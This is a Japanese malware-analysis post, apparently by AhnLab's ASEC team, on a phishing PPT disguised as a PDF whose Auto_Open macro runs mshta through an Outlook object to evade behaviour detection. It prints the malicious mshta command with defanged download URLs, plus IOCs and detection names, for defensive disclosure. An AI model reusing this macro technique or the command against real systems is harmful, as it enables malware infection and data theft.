最近、ASEC 分析チームは拡散が続いている不正な PPT ファイルの変形を確認した。従来のものと同じく mshta.exe を利用して不正なスクリプトを実行する動作方式であり、プロセスの中間で outlook.exe プロセスを利用する方式が追加された。
不正な PPT ファイルは以下のようにフィッシングメールの添付ファイルを通じて配布されており、購入の問い合わせに関する内容を含んでいる。また、過去のタイプと同じく不正な PPT ファイルは PDF の拡張子に偽装していることが確認できる。
- 拡散ファイル名
Purchase Inquiry_pdf.ppt
不正な PPT ファイルを開くとマクロを含むかどうかを選択する警告が表示され、マクロを含むボタンを選択すると不正なマクロが実行される。
不正なマクロは簡単なコードで構成されており、Auto_Open()関数によって自動で実行される形式である。今回の変形では、CreateObject(“Outlook.Application”)によって Outlook アプリケーションオブジェクトを生成して mshta コマンドを実行する部分が追加された。
最終的に outlook プロセスによって mshta が実行される。以下の図は当社 RAPIT システムで確認できるプロセスツリーである。
mshta コマンドは従来と同じく不正なスクリプトが含まれている Blogspot の Web ページにリンクする形式である。現在では当該 Web ページが削除され、追加の不正な振る舞いについては不明だが、不正なスクリプトによって AgentTesla 等の様々なマルウェアが実行される場合がある。
- 不正なコマンド
“C:\Windows\System32\mshta.exe” “hxxp://www.bitly.com/hdjalsdnbhagdehasd”
- Final URL
hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html
outlook.exe プロセスによって不正なコマンドを実行する方式の変形は、ビヘイビア検知を回避するための目的であると推定される。現在 V3 では、以下のようにビヘイビア検知が可能であることを確認できる。
フィッシングメールを通じて配布される不正な PPT ファイルは昨年から拡散が続いており、ユーザーは特に注意が必要である。また、出どころが不明なメールの添付ファイルを閲覧しないようにしなければならず、ドキュメントに含まれる疑わしいマクロは実行しないように注意しなければならない。
[ファイル検知]
- Downloader/PPT.Generic
[ビヘイビア検知]
- Execution/MDP.Mshta.M3815
[IOC 情報]
- 0769e2f9ed19847d1195aa1f31e7ed4a
- hxxp://www.bitly.com/hdjalsdnbhagdehasd
- hxxps://orkyakroonmeinkyukartaahunthekat1.blogspot.com/p/charles123uuu.html
[不正な PPT 関連の過去ブログ]
https://asec.ahnlab.com/jp/26751/
https://asec.ahnlab.com/ko/21964/
https://asec.ahnlab.com/jp/16732/
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報